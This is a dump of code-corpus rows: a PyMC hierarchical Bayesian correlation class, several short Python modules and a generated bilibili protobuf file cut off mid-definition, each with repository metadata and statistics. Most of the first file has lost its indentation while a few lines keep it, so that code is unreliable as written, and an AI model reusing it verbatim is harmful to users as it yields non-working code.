plot_data : plot the data overlaid with the ellipse described by the inferred correlated multivariate Normal
plot_corner : plot the 1D and 2D marginal distributions of the inferred parameters.
Examples
--------
Creating an instance is as simple as
>>> import pybaycor as pbc
    >>> bc = pbc.HierarchicalBayesianCorrelation(data=data, sigma=sigma)
Once you have created the instances, the fit is run with
>>> bc.fit()
or you can modify the length of burn-in and number of steps with
>>> bc.fit(steps=2000, tune=2000)
Once you are happy with the fit, you can get a tabular summary with
>>> summary = bc.summarise()
and visual summaries with
>>> bc.plot_trace()
>>> bc.plot_corner()
    >>> bc.plot_data()
"""
def __init__(self, data, sigma, mu_prior=[0.0,1000.], sigma_prior=200.):
self.fitted=False
if np.any(sigma <=0.):
raise ValueError("Uncertainties must be positive real numbers!")
self.plot_trace_vars = ['mu', "chol_corr"]
if data is None:
raise ValueError("Either data must be given as input, or x and y")
else:
self.ndim = data.shape[1]
self.npoints = data.shape[0]
self.data = data
if data.shape != sigma.shape:
raise RuntimeError("data and sigma must have the same shape!")
self.sigma = sigma
self.model = pm.Model()
with self.model:
#we put weakly informative hyperpriors on the means and standard deviations of the multivariate normal distribution
mu = pm.Normal("mu", mu=mu_prior[0], sigma=mu_prior[1], shape=self.ndim)
sigma = pm.HalfCauchy.dist(sigma_prior)
#and a hyperprior on the covariance matrix which weakly penalises strong correlations
chol, corr, stds = pm.LKJCholeskyCov("chol", n=self.ndim, eta=2.0, sd_dist=sigma, compute_corr=True)
#the hyperprior gives us the Cholesky Decomposition of the covariance matrix, so for completeness we can calculate that determinisitically
cov = pm.Deterministic("cov", chol.dot(chol.T))
#and now we can construct our multivariate normals to complete the prior
prior = pm.MvNormal('vals', mu=mu, chol=chol, shape=(self.npoints,self.ndim)) #, observed=self.data)
            #finally, the observed data are modelled as noisy measurements of
            #the latent values drawn above
            datavars = pm.Normal("data", mu=prior, sigma=self.sigma, observed=self.data)
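            # The hierarchy above as a sketch: each datum has a latent,
            # noise-free value drawn from the correlated multivariate Normal,
            # and the observation is a noisy measurement of it,
            #   true_i ~ MvNormal(mu, Sigma)
            #   data_i ~ Normal(true_i, sigma_i)
            # so the correlation is inferred between the latent values, with
            # the quoted uncertainties shrinking each point toward the ellipse.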
def data_summary(self, printout=True):
"""
"""
#if self.summary is None:
self.summary_data = az.summary(self.trace, var_names=["vals"], filter_vars="like", round_to=2)
if printout:
print(self.summary_data)
return self.summary_data
    def model_summary(self):
        """ Summarise the inferred hyperparameters (means, covariance and correlations). """
        if getattr(self, "summary", None) is None:
            self.summary = az.summary(self.trace, var_names=["~chol","~vals"], round_to=2)
        return self.summary
def plot_data(self, plot_input=True, plot_fitted=True,plotfile=None, show=None):
"""Plot the input data overlaid with the ellipse described by the inferred correlated multivariate distribution
Parameters
----------
plot_input : bool, default True
Whether to plot the input data and their uncertainties
plot_fitted : bool, default True
Whether to plot the inferred data and their inferred uncertainties
plotfile : str, optional
Name of a file to write the plot to
show : bool, optional, default False
Whether to show the plot window
"""
if not self.fitted:
raise RuntimeError("Please run fit() before attempting to plot the results")
        fitted_data = self.data_summary(printout=False)
        fitted_mean = fitted_data['mean'].to_numpy().reshape((self.npoints,self.ndim))
        fitted_sigma = fitted_data['sd'].to_numpy().reshape((self.npoints,self.ndim))
        if self.ndim == 2:
blue, _, red, *_ = sns.color_palette()
f, ax = plt.subplots(1, 1, figsize=(5, 4))#, gridspec_kw=dict(width_ratios=[4, 3]))
sns.scatterplot(x=self.data[:,0], y=self.data[:,1])
if plot_input:
ax.errorbar(x=self.data[:,0], y=self.data[:,1],
xerr=self.sigma[:,0], yerr=self.sigma[:,1],fmt='o',label='input data')
if plot_fitted:
ax.errorbar(x=fitted_mean[:,0], y=fitted_mean[:,1],
xerr=fitted_sigma[:,0], yerr=fitted_sigma[:,1],fmt='o',label='inferred data')
mu_post = self.trace.posterior["mu"].mean(axis=(0, 1)).data
sigma_post = self.trace.posterior["cov"].mean(axis=(0, 1)).data
var_post, U_post = np.linalg.eig(sigma_post)
angle_post = 180.0 / np.pi * np.arccos(np.abs(U_post[0, 0]))
e_post = Ellipse(
mu_post,
2 * np.sqrt(5.991 * var_post[0]),
2 * np.sqrt(5.991 * var_post[1]),
angle=angle_post,
)
e_post.set_alpha(0.5)
e_post.set_facecolor(blue)
e_post.set_zorder(10)
ax.add_artist(e_post)
rect_post = plt.Rectangle((0, 0), 1, 1, fc=blue, alpha=0.5)
ax.legend(
[rect_post],
["Estimated 95% density region"],
loc=2,
)
#plt.show()
        elif self.ndim > 2:
            blue, _, red, *_ = sns.color_palette()
            rows = self.ndim - 1
            cols = self.ndim - 1
            fig = plt.figure()
            grid = fig.add_gridspec(rows, cols, left=0.1, right=0.9, bottom=0.1, top=0.9,
                                    wspace=0.05, hspace=0.05)
            mu_full = self.trace.posterior["mu"].mean(axis=(0, 1)).data
            cov_full = self.trace.posterior["cov"].mean(axis=(0, 1)).data
            for i in range(self.ndim - 1):
                for j in range(i + 1, self.ndim):
                    ax = fig.add_subplot(grid[i, j - 1])
                    #plot the data points
                    sns.scatterplot(x=self.data[:, i], y=self.data[:, j], ax=ax)
                    if plot_input:
                        ax.errorbar(x=self.data[:, i], y=self.data[:, j],
                                    xerr=self.sigma[:, i], yerr=self.sigma[:, j], fmt='o')
                    if plot_fitted:
                        ax.errorbar(x=fitted_mean[:, i], y=fitted_mean[:, j],
                                    xerr=fitted_sigma[:, i], yerr=fitted_sigma[:, j], fmt='o')
                    #marginalise the posterior mean and covariance down to dimensions (i, j)
                    mu_post = mu_full[[i, j]]
                    sigma_post = cov_full[np.ix_([i, j], [i, j])]
                    var_post, U_post = np.linalg.eig(sigma_post)
                    angle_post = 180.0 / np.pi * np.arccos(np.abs(U_post[0, 0]))
                    e_post = Ellipse(
                        mu_post,
                        2 * np.sqrt(5.991 * var_post[0]),
                        2 * np.sqrt(5.991 * var_post[1]),
                        angle=angle_post,
                    )
                    e_post.set_alpha(0.5)
                    e_post.set_facecolor(blue)
                    e_post.set_zorder(10)
                    ax.add_artist(e_post)
        else:
            raise ValueError("ndim must be an integer of at least 2!")
        if isinstance(plotfile, str):
            plt.savefig(plotfile)
        elif plotfile is not None:
            raise TypeError("plotfile must be a string")
        if show:
            plt.show()
        elif plotfile is not None:
            plt.close()
class HierarchicalRobustBayesianCorrelation(HierarchicalBayesianCorrelation):
"""A class to infer robust Bayesian correlation coefficients for uncertain multidimensional data
Parameters
----------
data : float, (n_points, n_dim) array_like
The multidimensional dataset to infer correlations on.
    sigma : float, (n_points, n_dim) array_like
The uncertainties of the multidimensional dataset to infer correlations on.
mu_prior : length-2 or (2, ndim) iterable of floats, optional, default (0., 1000.)
The mean and standard deviation of the Gaussian prior on the multivariate t distribution
sigma_prior : scalar or (ndim) iterable of floats, optional, default 200.
The prior on the scale parameter (beta) of the half-Cauchy prior on the standard deviations of the multivariate t distribution
Attributes
----------
None
Methods
--------
    fit : Fit the data assuming they are drawn from a multivariate Student-t distribution
summarise : summarise the results of the fit
plot_trace : plot the trace and marginal distributions of the trace
plot_data : plot the data overlaid with the ellipse described by the inferred correlated multivariate Normal
plot_corner : plot the 1D and 2D marginal distributions of the inferred parameters.
Examples
--------
Creating an instance is as simple as
>>> import pybaycor as pbc
    >>> bc = pbc.HierarchicalRobustBayesianCorrelation(data=data, sigma=sigma)
Once you have created the instances, the fit is run with
>>> bc.fit()
or you can modify the length of burn-in and number of steps with
>>> bc.fit(steps=2000, tune=2000)
Once you are happy with the fit, you can get a tabular summary with
>>> summary = bc.summarise()
and visual summaries with
>>> bc.plot_trace()
>>> bc.plot_corner()
    >>> bc.plot_data()
"""
def __init__(self, data, sigma, mu_prior=[0.0,1000.], sigma_prior=200.):
self.fitted=False
if np.any(sigma <=0.):
raise ValueError("Uncertainties must be positive real numbers!")
self.plot_trace_vars = ['mu', "nu", "chol_corr"]
if data is None:
raise ValueError("Either data must be given as input, or x and y")
else:
self.ndim = data.shape[1]
self.npoints = data.shape[0]
self.data = data
if data.shape != sigma.shape:
raise RuntimeError("data and sigma must have the same shape!")
self.sigma = sigma
self.model = pm.Model()
with self.model:
#we put weakly informative hyperpriors on the means and standard deviations of the multivariate normal distribution
mu = pm.Normal("mu", mu=mu_prior[0], sigma=mu_prior[1], shape=self.ndim)
sigma = pm.HalfCauchy.dist(sigma_prior)
#and a hyperprior on the covariance matrix which weakly penalises strong correlations
chol, corr, stds = pm.LKJCholeskyCov("chol", n=self.ndim, eta=2.0, sd_dist=sigma, compute_corr=True)
#the hyperprior gives us the Cholesky Decomposition of the covariance matrix, so for completeness we can calculate that determinisitically
cov = pm.Deterministic("cov", chol.dot(chol.T))
nuMinusOne = pm.Exponential('nu-1', lam=1./29.)
nu = pm.Deterministic('nu', nuMinusOne + 1)
#and now we can construct our multivariate t distribituions to complete the prior
prior = pm.MvStudentT('vals', nu = nu, mu=mu, chol=chol, shape=(self.npoints,self.ndim)) #, observed=self.data)
            #finally, the observed data are modelled as noisy measurements of
            #the latent values drawn above
            for i in range(self.ndim):
                pm.Normal("data_" + str(i), mu=prior[:, i], sigma=self.sigma[:, i], observed=self.data[:, i])
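# Illustrative end-to-end sketch with synthetic data (hypothetical values,
# not part of the module):
#
#   import numpy as np
#   rng = np.random.default_rng(0)
#   true = rng.multivariate_normal([0., 0.], [[1., 0.8], [0.8, 1.]], size=50)
#   err = np.full_like(true, 0.1)
#   obs = true + err * rng.standard_normal(true.shape)
#   bc = HierarchicalRobustBayesianCorrelation(obs, err)
#   bc.fit(steps=1000, tune=1000)
#   bc.summarise()  # chol_corr[0, 1] should recover a value near 0.8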
| 39.206897 | 244 | 0.584636 | 3,863 | 29,562 | 4.391147 | 0.104841 | 0.021694 | 0.008253 | 0.013795 | 0.846489 | 0.832636 | 0.819784 | 0.800271 | 0.791487 | 0.782409 | 0 | 0.02024 | 0.314762 | 29,562 | 753 | 245 | 39.258964 | 0.81715 | 0.416548 | 0 | 0.713376 | 0 | 0 | 0.069055 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038217 | false | 0.009554 | 0.025478 | 0 | 0.089172 | 0.025478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6801cc99daf52e70ae86d48f358624f9815cd0e5 | 99 | py | Python | instapy_bot/cli/__init__.py | 7aske/instapy-bot | 5bcd6fdd3e54671a91f1687f6fd77fe90ce04e99 | [
"RSA-MD"
] | 9 | 2019-03-28T21:00:48.000Z | 2021-11-16T01:15:01.000Z | instapy_bot/cli/__init__.py | 7aske/instapy-bot | 5bcd6fdd3e54671a91f1687f6fd77fe90ce04e99 | [
"RSA-MD"
] | 1 | 2021-03-01T22:43:34.000Z | 2021-03-19T20:03:42.000Z | instapy_bot/cli/__init__.py | 7aske/instapy-bot | 5bcd6fdd3e54671a91f1687f6fd77fe90ce04e99 | [
"RSA-MD"
] | 5 | 2019-10-19T10:27:41.000Z | 2022-03-20T12:31:03.000Z | from instapy_bot.cli.cli import Cli
def client(*args, **kwargs):
return Cli(*args, **kwargs)
| 16.5 | 35 | 0.686869 | 15 | 99 | 4.466667 | 0.666667 | 0.298507 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161616 | 99 | 5 | 36 | 19.8 | 0.807229 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
6810faa7171171dbf2759cdfd47cf253e65f22dd | 101 | py | Python | pycalphad/refdata.py | amkrajewski/pycalphad | 313bf8042ff415abfcf979cb8a0491b8612ef96a | [
"MIT"
] | 2 | 2021-06-16T19:46:35.000Z | 2021-11-17T11:13:56.000Z | pycalphad/refdata.py | amkrajewski/pycalphad | 313bf8042ff415abfcf979cb8a0491b8612ef96a | [
"MIT"
] | null | null | null | pycalphad/refdata.py | amkrajewski/pycalphad | 313bf8042ff415abfcf979cb8a0491b8612ef96a | [
"MIT"
] | null | null | null | raise ImportError('pycalphad.refdata has been moved to ESPEI. Please install ESPEI 0.3.1 or later.')
| 50.5 | 100 | 0.782178 | 17 | 101 | 4.647059 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034091 | 0.128713 | 101 | 1 | 101 | 101 | 0.863636 | 0 | 0 | 0 | 0 | 0 | 0.782178 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
68165809943b3d7495b1074e1e48cd689254e1e3 | 1,063 | py | Python | rastervision/evaluation/__init__.py | carderne/raster-vision | 915fbcd3263d8f2193e65c2cd0eb53e050a47a01 | [
"Apache-2.0"
] | 4 | 2019-03-11T12:38:15.000Z | 2021-04-06T14:57:52.000Z | rastervision/evaluation/__init__.py | carderne/raster-vision | 915fbcd3263d8f2193e65c2cd0eb53e050a47a01 | [
"Apache-2.0"
] | null | null | null | rastervision/evaluation/__init__.py | carderne/raster-vision | 915fbcd3263d8f2193e65c2cd0eb53e050a47a01 | [
"Apache-2.0"
] | 1 | 2020-04-27T15:21:53.000Z | 2020-04-27T15:21:53.000Z | # flake8: noqa
from rastervision.evaluation.evaluation_item import *
from rastervision.evaluation.class_evaluation_item import *
from rastervision.evaluation.evaluator import *
from rastervision.evaluation.evaluator_config import *
from rastervision.evaluation.classification_evaluation import *
from rastervision.evaluation.chip_classification_evaluation import *
from rastervision.evaluation.object_detection_evaluation import *
from rastervision.evaluation.semantic_segmentation_evaluation import *
from rastervision.evaluation.classification_evaluator import *
from rastervision.evaluation.classification_evaluator_config import *
from rastervision.evaluation.chip_classification_evaluator import *
from rastervision.evaluation.chip_classification_evaluator_config import *
from rastervision.evaluation.object_detection_evaluator import *
from rastervision.evaluation.object_detection_evaluator_config import *
from rastervision.evaluation.semantic_segmentation_evaluator import *
from rastervision.evaluation.semantic_segmentation_evaluator_config import *
| 55.947368 | 76 | 0.888993 | 111 | 1,063 | 8.252252 | 0.144144 | 0.279476 | 0.454148 | 0.524017 | 0.94214 | 0.875546 | 0.422489 | 0 | 0 | 0 | 0 | 0.001005 | 0.06397 | 1,063 | 18 | 77 | 59.055556 | 0.919598 | 0.011289 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
a881205d8cf3aae3d50703a0043306acd5c161e5 | 164 | py | Python | service/pk_service.py | leexinhao/boya-backend | 3c0cf265f4b37312ead5e62be0fd81757c4f59dd | [
"Apache-2.0"
] | null | null | null | service/pk_service.py | leexinhao/boya-backend | 3c0cf265f4b37312ead5e62be0fd81757c4f59dd | [
"Apache-2.0"
] | null | null | null | service/pk_service.py | leexinhao/boya-backend | 3c0cf265f4b37312ead5e62be0fd81757c4f59dd | [
"Apache-2.0"
] | 1 | 2022-03-12T03:40:00.000Z | 2022-03-12T03:40:00.000Z | from service.utils import generate_verification_code
def gen_key_service(code_len=6):
"""
    Randomly generate a six-digit verification code.
"""
return generate_verification_code(code_len) | 27.333333 | 52 | 0.756098 | 21 | 164 | 5.52381 | 0.666667 | 0.344828 | 0.413793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007299 | 0.164634 | 164 | 6 | 53 | 27.333333 | 0.839416 | 0.054878 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
a8c9234a0cc2b97ddac308d4ad3f77b38a9a35c4 | 39,254 | py | Python | bilibili/app/archive/v1/archive_pb2.py | Privoce/all-in-danmaku-server | b13bd3dae26d65540b7cf5c3d8ef3569111d1676 | [
"MIT"
] | null | null | null | bilibili/app/archive/v1/archive_pb2.py | Privoce/all-in-danmaku-server | b13bd3dae26d65540b7cf5c3d8ef3569111d1676 | [
"MIT"
] | null | null | null | bilibili/app/archive/v1/archive_pb2.py | Privoce/all-in-danmaku-server | b13bd3dae26d65540b7cf5c3d8ef3569111d1676 | [
"MIT"
] | 2 | 2021-07-14T06:34:39.000Z | 2021-07-14T07:30:12.000Z | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: bilibili/app/archive/v1/archive.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='bilibili/app/archive/v1/archive.proto',
package='bilibili.app.archive.v1',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n%bilibili/app/archive/v1/archive.proto\x12\x17\x62ilibili.app.archive.v1\"\xa7\x05\n\x03\x41rc\x12\x0b\n\x03\x61id\x18\x01 \x01(\x03\x12\x0e\n\x06videos\x18\x02 \x01(\x03\x12\x0e\n\x06typeId\x18\x03 \x01(\x05\x12\x10\n\x08typeName\x18\x04 \x01(\t\x12\x11\n\tcopyright\x18\x05 \x01(\x05\x12\x0b\n\x03pic\x18\x06 \x01(\t\x12\r\n\x05title\x18\x07 \x01(\t\x12\x0f\n\x07pubdate\x18\x08 \x01(\x03\x12\r\n\x05\x63time\x18\t \x01(\x03\x12\x0c\n\x04\x64\x65sc\x18\n \x01(\t\x12\r\n\x05state\x18\x0b \x01(\x05\x12\x0e\n\x06\x61\x63\x63\x65ss\x18\x0c \x01(\x05\x12\x11\n\tattribute\x18\r \x01(\x05\x12\x0b\n\x03tag\x18\x0e \x01(\t\x12\x0c\n\x04tags\x18\x0f \x03(\t\x12\x10\n\x08\x64uration\x18\x10 \x01(\x03\x12\x11\n\tmissionId\x18\x11 \x01(\x03\x12\x0f\n\x07orderId\x18\x12 \x01(\x03\x12\x13\n\x0bredirectUrl\x18\x13 \x01(\t\x12\x0f\n\x07\x66orward\x18\x14 \x01(\x03\x12/\n\x06rights\x18\x15 \x01(\x0b\x32\x1f.bilibili.app.archive.v1.Rights\x12/\n\x06\x61uthor\x18\x16 \x01(\x0b\x32\x1f.bilibili.app.archive.v1.Author\x12+\n\x04stat\x18\x17 \x01(\x0b\x32\x1d.bilibili.app.archive.v1.Stat\x12\x14\n\x0creportResult\x18\x18 \x01(\t\x12\x0f\n\x07\x64ynamic\x18\x19 \x01(\t\x12\x10\n\x08\x66irstCid\x18\x1a \x01(\x03\x12\x35\n\tdimension\x18\x1b \x01(\x0b\x32\".bilibili.app.archive.v1.Dimension\x12\x35\n\tstaffInfo\x18\x1c \x03(\x0b\x32\".bilibili.app.archive.v1.StaffInfo\x12\x10\n\x08seasonId\x18\x1d \x01(\x03\x12\x13\n\x0b\x61ttributeV2\x18\x1e \x01(\x03\"1\n\x06\x41uthor\x12\x0b\n\x03mid\x18\x01 \x01(\x03\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x0c\n\x04\x66\x61\x63\x65\x18\x03 \x01(\t\":\n\tDimension\x12\r\n\x05width\x18\x01 \x01(\x03\x12\x0e\n\x06height\x18\x02 \x01(\x03\x12\x0e\n\x06rotate\x18\x03 \x01(\x03\"\xb2\x01\n\x04Page\x12\x0b\n\x03\x63id\x18\x01 \x01(\x03\x12\x0c\n\x04page\x18\x02 \x01(\x05\x12\x0c\n\x04\x66rom\x18\x03 \x01(\t\x12\x0c\n\x04part\x18\x04 \x01(\t\x12\x10\n\x08\x64uration\x18\x05 \x01(\x03\x12\x0b\n\x03vid\x18\x06 \x01(\t\x12\x0c\n\x04\x64\x65sc\x18\x07 \x01(\t\x12\x0f\n\x07webLink\x18\x08 \x01(\t\x12\x35\n\tdimension\x18\t \x01(\x0b\x32\".bilibili.app.archive.v1.Dimension\"\xd6\x01\n\x06Rights\x12\n\n\x02\x62p\x18\x01 \x01(\x05\x12\x0c\n\x04\x65lec\x18\x02 \x01(\x05\x12\x10\n\x08\x64ownload\x18\x03 \x01(\x05\x12\r\n\x05movie\x18\x04 \x01(\x05\x12\x0b\n\x03pay\x18\x05 \x01(\x05\x12\x0b\n\x03hd5\x18\x06 \x01(\x05\x12\x11\n\tnoReprint\x18\x07 \x01(\x05\x12\x10\n\x08\x61utoplay\x18\x08 \x01(\x05\x12\x0e\n\x06ugcPay\x18\t \x01(\x05\x12\x15\n\risCooperation\x18\n \x01(\x05\x12\x15\n\rugcPayPreview\x18\x0b \x01(\x05\x12\x14\n\x0cnoBackground\x18\x0c \x01(\x05\":\n\tStaffInfo\x12\x0b\n\x03mid\x18\x01 \x01(\x03\x12\r\n\x05title\x18\x02 \x01(\t\x12\x11\n\tattribute\x18\x03 \x01(\x03\"\xac\x01\n\x04Stat\x12\x0b\n\x03\x61id\x18\x01 \x01(\x03\x12\x0c\n\x04view\x18\x02 \x01(\x05\x12\x0f\n\x07\x64\x61nmaku\x18\x03 \x01(\x05\x12\r\n\x05reply\x18\x04 \x01(\x05\x12\x0b\n\x03\x66\x61v\x18\x05 \x01(\x05\x12\x0c\n\x04\x63oin\x18\x06 \x01(\x05\x12\r\n\x05share\x18\x07 \x01(\x05\x12\x0f\n\x07nowRank\x18\x08 \x01(\x05\x12\x0f\n\x07hisRank\x18\t \x01(\x05\x12\x0c\n\x04like\x18\n \x01(\x05\x12\x0f\n\x07\x64islike\x18\x0b \x01(\x05\x62\x06proto3'
)
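# Editorial note (not emitted by protoc): the serialized_pb bytes above are
# the compiled archive.proto itself, and the Descriptor objects below unpack
# it so that message classes such as Arc can be generated by reflection.
# A hedged usage sketch, assuming the package is importable:
#   from bilibili.app.archive.v1 import archive_pb2
#   arc = archive_pb2.Arc(aid=1, title="demo")
#   payload = arc.SerializeToString()
#   roundtrip = archive_pb2.Arc.FromString(payload)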
_ARC = _descriptor.Descriptor(
name='Arc',
full_name='bilibili.app.archive.v1.Arc',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='aid', full_name='bilibili.app.archive.v1.Arc.aid', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='videos', full_name='bilibili.app.archive.v1.Arc.videos', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='typeId', full_name='bilibili.app.archive.v1.Arc.typeId', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='typeName', full_name='bilibili.app.archive.v1.Arc.typeName', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='copyright', full_name='bilibili.app.archive.v1.Arc.copyright', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pic', full_name='bilibili.app.archive.v1.Arc.pic', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='title', full_name='bilibili.app.archive.v1.Arc.title', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pubdate', full_name='bilibili.app.archive.v1.Arc.pubdate', index=7,
number=8, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ctime', full_name='bilibili.app.archive.v1.Arc.ctime', index=8,
number=9, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='desc', full_name='bilibili.app.archive.v1.Arc.desc', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='state', full_name='bilibili.app.archive.v1.Arc.state', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='access', full_name='bilibili.app.archive.v1.Arc.access', index=11,
number=12, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='attribute', full_name='bilibili.app.archive.v1.Arc.attribute', index=12,
number=13, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tag', full_name='bilibili.app.archive.v1.Arc.tag', index=13,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tags', full_name='bilibili.app.archive.v1.Arc.tags', index=14,
number=15, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='duration', full_name='bilibili.app.archive.v1.Arc.duration', index=15,
number=16, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='missionId', full_name='bilibili.app.archive.v1.Arc.missionId', index=16,
number=17, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='orderId', full_name='bilibili.app.archive.v1.Arc.orderId', index=17,
number=18, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='redirectUrl', full_name='bilibili.app.archive.v1.Arc.redirectUrl', index=18,
number=19, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
